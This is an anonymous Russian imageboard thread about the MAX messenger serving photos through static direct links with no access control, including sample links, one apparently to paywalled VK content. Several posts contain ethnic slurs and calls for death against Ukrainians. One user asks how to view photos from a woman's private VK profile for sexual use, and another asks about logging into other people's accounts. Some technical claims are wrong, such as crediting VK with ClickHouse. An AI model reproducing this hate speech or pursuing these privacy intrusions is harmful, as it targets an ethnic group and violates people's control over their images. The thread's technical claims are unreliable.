У них прямые статические ссылке в сраксе. Ни ацесс токенов в хедере, ни сигнатуры в самой ссылке там нет.
Вот еблан оп скинул фотки глубинариев несколько часов назад из сракса, открывай откуда угодно хоть спустя сутки, любуйся
Поэтому они больше всех переживают из-за макса.
У маера нет прямого доступа. До продовой бд доступа нет даже у самих разрабов. Это все запрашивается через официальное обращение, особенно когда третьи лица. Да, понятное дело что им просто это все сделать сейчас, но все еще через прокладки всякие общаться приходится.
В общем оп хотел сказать что они прямое апи предоставляют как можно выкачивать всю информацию о пользаках не прибегая к формальным процедурам. Это совсем другой уровень доступа. Можно скрапить бд даже не прибегая вообще ни к чему, весь апи открыт
А в чем суть твоего комментария? Я тебе показываю пальцем и говорю хуевое решение. Ты мне говоришь что НУ ВОТ В США и тп... ебанутый короче.
В телеге все по канонам сделано если че. Почему в максе не так - вопросы. Это все же мессенджер, а не соц сеть с софт порно.
> Вот еблан оп скинул фотки глубинариев несколько часов назад из сракса, открывай откуда угодно хоть спустя сутки, любуйся
Слив века.
О, перепроверил, они убрали эту срань.
Теперь можно и обычной укэп подписывать, и чисто через госуслуги/госключ. Неужели...
В тот момент, когда я с этим столкнулся, было чуть иначе.
Потому что используется криптография и подбирать эти ссылки лишено всякого смысла, убьешь хуеву кучу лет (и это при условии что алгоритм не поменяют) чтобы получить рандомную фотокарточку из рандомного паблика, которая и без того в открытом доступе лежит.
> Вот еблан оп скинул фотки
Это скачанные из интернетов фотки, которые еблан-оп сам же в макс и загрузил. А учитывая что он скинул целую простыню из этих ссылок - значит либо он шизоид конченный, либо это очередной хохлятский псиоп.
Вот и думой
Нормальное решение, вкатышек. Удачи тебе перебрать хотя бы 4 символа.
я тебе по факту ответил, посикал на тебя, а ты проглотил
При чем тут слив не слив, если тебе пример ссылок просто показали, тупоголовый даун? И объяснили почему это решение с технической точки зрения полная хуета. Тебе ответили на эту тему, а не на эту срань что ты начал из себя давить
Ты, идиот, слышал звон, но не знаешь где он. Разберись с понятием криптография и где там надо подбирать и что миллион лет.
В ссылках этих никаких криптографий, это просто рандомная строка сгенерированная, которую могут видеть те кому это не положено. Какой нибудь хуй сидя у провайдера просто логи грепанет по ним и будет сидеть рассматривать с каких углов ты свой анус фотографируешь
Как скажешь, свынь)
Зачем их подбирать, когда их можно взять из слива логов? Для этого даже доступ к БД не нужен. Я не понимаю как ты такое решение можешь дефать. Оно же ебанутое, как не крути. Почему у телеги все впорядке с этим? Ладно бы ты сказал что по другому нельзя, а тут получается что челы на похуй поступили.
Да и вообще то что они на этих ендпоинтах вечность хранятся, меня трясет сука от этого. Я дольжен контролировать свое инфо.
Подозреваю, что хохлы срать хотели на этот троян ебучий с гуем от месседжера.
Крым Русский, каждому хохлу по два кирпича, а макс это кал, что на это скажешь?
Провайдер не увидит, так как не будет видеть /path. Но вот балансировщик на облаке где приложение хостуется будет видеть это. И к логам этим доступ будет у большего количества людей чем нужно. Да и утечка через расширения, браузер и прочее вполне вероятно. Буквально даешь злоумышленикам уже все готовенькое.
Анончик сейчас каждый второй пользуется VPN, а VPN в отличие от ISP видит все твои гет реквесты и параметры.
>Я дольжен контролировать свое инфо.
Ты должен контролировать не свою инфу, а пути ее передачи, переходи на правильную сторону.
>Да и вообще то что они на этих ендпоинтах вечность хранятся, меня трясет сука от этого. Я дольжен контролировать свое инфо.
Хочешь контролировать - не позволяй своему инфо покидать свою пекарню. А если ты что-то куда-то залил, то никакого способа проверить - реально владелец сервера удалил файл или просто притворяется - нет.
>Ты должен контролировать не свою инфу, а пути ее передачи, переходи на правильную сторону.
Давай твердо и четко. Могу доверять VK? Заебался VPN пользоваться для того чтобы в телегу картинки грузить.
Все вопросы разрабу вашего Мах
А есть варик чекнуть фотки закрытого профиля вк? Одна милфа пышечка закрыла акк, а я весь фап контент с ней почистил во время генеральной уборки );
Его сделал Ростелеком
Хуя у него статус с орлом, тупо БАЗОВИЧОК. Респект таким ребятам.
Хуй знает чё ты на меня выебнулся, я так и написал
В максе дохлых хохлов с отрезанной башкой разглядываю и чет ни одной фотки вы хохлявые пидорасы не принесли, почему так? Смерть усраине
>для людей сделали ахуенный бесплатный ArchLinux
>все люди продолжают сидеть на венде жрать гавно
>одно дело когда ты делаешь конкурентный продукт, который должен быть настолько охенен, что люди сами в него придут.
Ага, сами, ага))) пришли, верю, ага, вот тут верю))) ну да))) сами)))
Он молодой исчо, пынимать надо, пройдут года, поумнеет.
а разве эту хуйню дескридетировать надо
обоссал ебало матерям всушников, смерть усраине
>Церкви Азуло-веры, разумеется
АНША АЗУЛ, БРАТ!
ААНГ НЕ ЗАКОН. АЗУЛА ЗАКОН.
> Давай твердо и четко. Могу доверять VK? Заебался VPN пользоваться для того чтобы в телегу картинки грузить.
Это твое личное дело кому доверять, а кому нет, ты взрослый человек и сам должен принимать решения. Что касается меня - нет, я не доверяю, у меня там и страницы уже лет 7 как нет.
> БЕЗОПАСНЫЙ месседжер MAX
> Вся безопасность на уровне "Блябуду, безопасно, крч"
Неужели быдлу так легко начать в ебало? Чем он безопасный? У него открыты исходники? Нет. У него есть p2p или хотя бы сквозное шифрование? Нет. Был ли хоть один независимый аудит по безопасности? Нет.
Где безопасность? Точно так же можно написать, что он, например, говносральный. А чё не так? И то, и другое утверждение без пруфов, значит они одинаково валидны.
> Вся безопасность на уровне "Блябуду, безопасно, крч"
Неужели быдлу так легко начать в ебало? Чем он безопасный? У него открыты исходники? Нет. У него есть p2p или хотя бы сквозное шифрование? Нет. Был ли хоть один независимый аудит по безопасности? Нет.
Где безопасность? Точно так же можно написать, что он, например, говносральный. А чё не так? И то, и другое утверждение без пруфов, значит они одинаково валидны.
Ну его перзидент рекламирует. Перзидент не посоветует же небезопасное. Правда?
А ктоснибудт пробовал скомпроментировать данные аутентификации и залогиниться под чужим акком как в вотсапе и телеге например?
Медведев айпады рекламировал и айфоны напрммеръ
Рад видеть тебя брат. АНША АЗУЛА! АНША АЗУЛА!
Мне в соседнем треде сказали, что можно будет ей писик понюхать и ножки поняшить
Ты опять на связь выходишь, мудила?
Да, это я, задавайте ответы
На онеме.рф?
Зумероскот, тебе 12 лет что ли? Такая хуйня была в вк с момента его появления
Иди, реверси функцию rand(). Какие же двачеры дегенераты
Тебе стоит интересоваться (брызгать тут слюной) только если у тебя реально макс стоит. А если он стоит то можешь запросить в (только в) макс фото своего хуя и разобрав макс на части по инструкции - найти нем запись о фотке твоего хуя. По этой записи составить url на сайт oneme и вставив эту url в любой браузер и перейдя по ней - узреть что фото твоего хуя появилось на oneme
>используется криптография и подбирать эти ссылки лишено всякого смысла
Обосрался.
> то функция хеша реверсинжинирится. это геморрройно и требует больших мощностей но вполне реально.
Причём тут функция хеша? Что там хешируется то и зачем?
>алгоритм говно, кстати, можно высчитать функция преобразования в хеш
Почему алгоритм говно и в чём виновата хеш-функция?
>если у тебя есть доступ к генератору урлов (т.е. если ты можешь писать в чат и смотреть итоговый урл) то функция хеша реверсинжинирится. это геморрройно и требует больших мощностей но вполне реально.
Ну у меня простейший MD5,но с солью и перцем. Твои радужные таблицы идут нахуй
> Это невероятный вид тролинга?
Не знаю, ведь Макс не ставил никогда.
проблемы блохастых
Тише. Гою спокойнее, когда сервер 404 рисует. Гой думает что файл удален. И из бекапов тоже удален. Никак не восстановить.
>VPN пользоваться для того чтобы в телегу картинки грузить.
А нахуя? Ты долбаёб который не увидел в ТГ мтпрото? Да скорость иногда разнится, но иногда норм.
Какого хуя они вообще доступны? Понимаю. что ты защитник совка и тебе похуй на здравый смысл, но все же. Сам же рано или поздно в своем дерьме захлебнешься.
>пол зарплаты
>1200 рублей
xDDD
>А помните когда двачеры были такими?
Никогда в жизни они такими не были. Двачер по определению может только обосраться, поскользнуться на своём же говне и разбить себе голову. Всё крупные победы анона были на форчане, руанон способен только мелко подгадить Наташе Еотовой, слив её сиськи, которые она по недоразумению скинула анону сама.
Мимо олд
Я описал тебе реальность
Ты оперируешь маняфантазиями об идеальном мире
>само фото не удалиться.
>Я просто не понимаю зачем так делать.
Поясняю: ВК - хайлоад система.
При таких нагрузках стандартные базы типа оракла, постгресса, кассандры и.т.д. делают пук среньк - нужно собирать кластер, нужно ебаться с балансировкой - это сложно, долго и дорого. Очень, ОЧЕНЬ дорого.
Поэтому в ВК решили пойти по другому пути - они проанализировали свои потребности и написали под них свою БД. Clickhouse.
Для задач ВК она действительно работает быстрее аналогов, а это экономит нехуёвые деньги на аренде железа.
Но есть нюансы. Один из них - в кликхаусе В ПРИНЦИПЕ НЕТ ОПЕРАЦИИ УДАЛЕНИЯ.
Им проще пометить строку как неиспользуемую, вместо того чтобы катить транзакцию удаления и прогонять индексацию всей таблицы. Проще и быстрее.
Логика та же как у SSD с их TRIM, вместо удаления инфы - пометим блок как пустой, потом туда что-нибудь запишется а мы ресурс сэкономим.
Блять, это какой-то пиздец на уровне СЮРА, я вообще без понятия что там за мегаразум такое запрограммировал. Вешаешь хедер авторизации хотябы бейсик, чтобы токо ты и те у кого доступ есть могли такое смотреть.
Это невероятный вид тролинга?
Пример ссылки:
https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2NotAeTcpgsiX47b41tnBHgzh5D1siXO-fczjFQyKnywu1z
Вот мне интересно у ВэКа так же работает все по прям ссылкам? Я вот подписан на платную группу Кристины Финк, где плачу ей каждый месяц денюшку. Если я дам вам ссылку вы сможете посмотртеь что внутри лежит? Кидайте в тред если открылось. Давайте проверять:
https://sun9-14.userapi.com/s/v1/ig2/LQnkczQ-1Eb-NKAPt6XQNxGKCOln8YMFvrGILdQODtd5379jPsvt1Ueg6drM7ovc6KRnjgPHQRennJusd-PWrSxz.jpg?quality=95&as=32x48,48x72,72x108,108x162,160x240,240x360,360x540,480x720,540x810,640x960,720x1080,1080x1620,1280x1920,1440x2160,1500x2250&from=bu&u=oCwRU9PyQ3h1xqcJOOo5RNoyIY2F5cOK3uY2cDks6wk&cs=640x0
То есть, этот контент, человек спрятал за пейвол, запаривался, снимал и если его вот так вот по прямой ссылке можно спиздить это же пиздец.